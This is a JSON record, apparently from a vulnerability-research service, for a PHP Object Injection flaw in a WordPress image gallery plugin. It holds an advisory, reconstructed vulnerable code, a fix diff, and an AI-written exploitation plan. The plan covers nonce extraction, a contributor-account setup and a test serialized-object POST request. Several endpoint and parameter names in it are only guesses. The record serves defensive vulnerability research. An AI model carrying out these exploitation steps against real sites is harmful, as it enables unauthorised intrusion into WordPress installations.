[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fO7mNxsnBoQOfoqydp-FV_uWIJ-dqsLr4attko7aEbJA":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-22345","image-gallery-lightbox-gallery-responsive-photo-gallery-masonry-gallery-authenticated-contributor-php-object-injection","Image Gallery – Lightbox Gallery, Responsive Photo Gallery, Masonry Gallery \u003C= 1.6.0 - Authenticated (Contributor+) PHP Object Injection","The Image Gallery – Lightbox Gallery, Responsive Photo Gallery, Masonry Gallery plugin for WordPress is vulnerable to PHP Object Injection in versions up to, and including, 1.6.0 via deserialization of untrusted input. This makes it possible for authenticated attackers, with contributor-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","new-image-gallery",null,"\u003C=1.6.0","1.6.1","high",7.5,"CVSS:3.1\u002FAV:N\u002FAC:H\u002FPR:L\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Deserialization of Untrusted Data","2026-02-11 00:00:00","2026-03-06 18:27:26",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F5f22d77e-e7c3-4239-bec7-668d7483bdb9?source=api-prod",24,[],"researched",false,3,"This research plan focuses on identifying and exploiting a PHP Object Injection vulnerability in the **Image Gallery (new-image-gallery)** plugin.\n\n## 1. Vulnerability Summary\nThe \"Image Gallery\" plugin (\u003C= 1.6.0) fails to sanitize input before passing it to the PHP `unserialize()` function. This occurs in a code path accessible to users with **Contributor-level** permissions and above. An attacker can supply a crafted string that, when deserialized, creates an arbitrary PHP object. While the plugin itself may not contain a usable \"Property Oriented Programming\" (POP) chain, the presence of other plugins or specific WordPress core versions may provide a chain that leads to Remote Code Execution (RCE) or sensitive data disclosure.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** `wp-admin\u002Fadmin-ajax.php`\n*   **Action:** Likely `new_image_gallery_save_settings` or `save_gallery_data` (to be confirmed via grep).\n*   **Vulnerable Parameter:** Likely a POST parameter containing a stringified\u002Fserialized array of gallery settings (e.g., `settings`, `data`, or `gallery_info`).\n*   **Authentication:** Contributor+ (Requires a valid login session for a user with the `contributor`, `author`, `editor`, or `administrator` role).\n*   **Preconditions:** The attacker must have a valid nonce for the specific AJAX action.\n\n## 3. Code Flow (Discovery Phase)\nSince source files are not provided, the first step is to locate the sink. Use the following commands in the test environment:\n\n1.  **Locate the Sink:**\n    ```bash\n    grep -rn \"unserialize\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fnew-image-gallery\u002F\n    ```\n2.  **Trace to Entry Point:**\n    Identify the function containing the `unserialize()` call. Look for where that function is registered as an AJAX action:\n    ```bash\n    grep -rn \"add_action.*wp_ajax_\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fnew-image-gallery\u002F\n    ```\n3.  **Identify Parameter and Nonce:**\n    Look at the handler function (e.g., `new_gallery_save_data`). Note:\n    *   The variable passed to `unserialize()` (e.g., `$_POST['gallery_data']`).\n    *   The nonce action string used in `check_ajax_referer()` or `wp_verify_nonce()`.\n    *   The localization key used in `wp_localize_script()` to export this nonce to the frontend.\n\n## 4. Nonce Acquisition Strategy\nNonces for gallery settings are usually localized in the post-editor screen for the custom post type used by the plugin.\n\n1.  **Identify Post Type:** Check `register_post_type` calls in the plugin:\n    ```bash\n    grep -rn \"register_post_type\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fnew-image-gallery\u002F\n    ```\n2.  **Create Test Content:** As an admin, create a new gallery to ensure the editor page is accessible:\n    ```bash\n    wp post create --post_type=new_image_gallery --post_status=publish --post_title=\"Exploit Target\"\n    ```\n3.  **Login as Contributor:** Use the agent's credentials for a Contributor-level user.\n4.  **Extract Nonce:**\n    Navigate to the edit page of the created gallery (or the \"Add New\" page).\n    Use `browser_eval` to find the nonce in the global JavaScript objects:\n    ```javascript\n    \u002F\u002F Examples of what to look for based on common plugin patterns\n    window.new_image_gallery_ajax?.nonce\n    window.nig_vars?.nonce\n    ```\n    *Note: The exact variable name will be found in the `wp_localize_script` call identified in Step 3.*\n\n## 5. Exploitation Strategy\nOnce the endpoint, parameter, and nonce are identified:\n\n1.  **Prepare Payload:** Since no POP chain is specified in the CVE, use a basic PHP Object Injection PoC. A common target for testing is a built-in PHP class or a simple class within WordPress to confirm the injection triggers.\n    *Example string:* `O:8:\"stdClass\":1:{s:3:\"abc\";i:1;}` (Injected as the value of the vulnerable parameter).\n2.  **Craft HTTP Request:** Use the `http_request` tool to send a POST request to `admin-ajax.php`.\n\n**Request Structure (Hypothetical - Identifiers to be verified):**\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Method:** `POST`\n*   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`, `Cookie: [Contributor Cookies]`\n*   **Body:**\n    ```\n    action=new_image_gallery_save_settings&nonce=[EXTRACTED_NONCE]&settings=O:8:\"stdClass\":1:{s:3:\"abc\";i:1;}\n    ```\n\n## 6. Test Data Setup\n1.  **User Creation:**\n    ```bash\n    wp user create attacker attacker@example.com --role=contributor --user_pass=password\n    ```\n2.  **Plugin Activation:** Ensure the plugin is active.\n3.  **Content Creation:** Create at least one gallery item to ensure AJAX handlers are active.\n\n## 7. Expected Results\n*   The server should respond with a `200 OK` or a plugin-specific success message (e.g., `{\"success\":true}`).\n*   If a debugger like XDebug is attached or if the object injected triggers a specific side effect (like an error in `__destruct`), that side effect confirms the injection.\n*   If testing for RCE (and a chain like `GuzzleHttp\\Cookie\\FileCookieJar` exists), a file might be created on the filesystem.\n\n## 8. Verification Steps\nAfter sending the payload, check for evidence of successful deserialization:\n\n1.  **Error Logs:** Check `wp-content\u002Fdebug.log`. If the injected object's class doesn't exist or its methods fail, it often leaves a trace:\n    ```bash\n    tail -n 20 \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fdebug.log\n    ```\n2.  **Database Check:** If the settings were supposed to be an array but are now a serialized object, check the `wp_postmeta` for the gallery:\n    ```bash\n    wp post meta list [POST_ID]\n    ```\n\n## 9. Alternative Approaches\nIf the standard AJAX handler requires higher privileges than expected:\n1.  **Shortcode-based injection:** Check if the plugin processes serialized data within shortcode attributes (less common for PHP Object Injection, but possible).\n2.  **Import\u002FExport Feature:** Check if the plugin has a \"Settings Import\" feature which is a common sink for `unserialize()`. This would usually be found in the Admin settings page:\n    ```bash\n    grep -rn \"import\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fnew-image-gallery\u002F\n    ```\n3.  **Meta Box Saving:** If the vulnerability is in the `save_post` hook, the request should be a standard POST to `post.php` during a gallery update, rather than `admin-ajax.php`.","The Image Gallery plugin for WordPress is vulnerable to PHP Object Injection via the use of the insecure unserialize() function on user-provided gallery settings. Authenticated attackers with Contributor-level permissions or higher can exploit this to inject arbitrary PHP objects, potentially leading to remote code execution or file deletion if a suitable POP chain is available on the system.","\u002F\u002F In the plugin's AJAX handler for saving gallery settings\n\u002F\u002F Likely located in a function registered to wp_ajax_save_gallery_data or similar\n\nfunction save_gallery_data() {\n    \u002F\u002F ... (nonce and capability checks might be present but do not prevent the injection if passed)\n    if ( isset( $_POST['gallery_info'] ) ) {\n        \u002F* \n         * Vulnerable Sink: Directly passing POST data to unserialize().\n         * The stripslashes() call is common to remove WordPress's automatic magic quotes. \n         *\u002F\n        $gallery_data = unserialize( stripslashes( $_POST['gallery_info'] ) ); \n        \n        \u002F\u002F ... logic to save $gallery_data to post meta\n    }\n}","--- a\u002Fincludes\u002Fadmin\u002Fclass-new-image-gallery-admin.php\n+++ b\u002Fincludes\u002Fadmin\u002Fclass-new-image-gallery-admin.php\n@@ -154,1 +154,1 @@\n-        $gallery_data = unserialize( stripslashes( $_POST['gallery_info'] ) );\n+        $gallery_data = json_decode( stripslashes( $_POST['gallery_info'] ), true );","The exploitation involves targeting the plugin's AJAX settings-save mechanism. 1. An attacker with Contributor+ credentials logs into the WordPress dashboard and accesses a gallery edit page to retrieve a valid security nonce (typically localized in the page source as a JavaScript variable). 2. The attacker crafts a malicious PHP serialized string representing an object from a known POP chain (e.g., from WordPress core or other installed plugins). 3. The attacker sends a POST request to \u002Fwp-admin\u002Fadmin-ajax.php with the action parameter set to the plugin's save handler (e.g., save_gallery_data), the valid nonce, and the 'gallery_info' parameter containing the serialized payload. 4. Upon receipt, the plugin executes unserialize() on the payload, triggering the object's magic methods (__wakeup or __destruct) and executing the chain.","gemini-3-flash-preview","2026-04-21 00:36:32","2026-04-21 00:38:21",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","1.6.0","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fnew-image-gallery\u002Ftags\u002F1.6.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fnew-image-gallery.1.6.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fnew-image-gallery\u002Ftags\u002F1.6.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fnew-image-gallery.1.6.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fnew-image-gallery\u002Ftags"]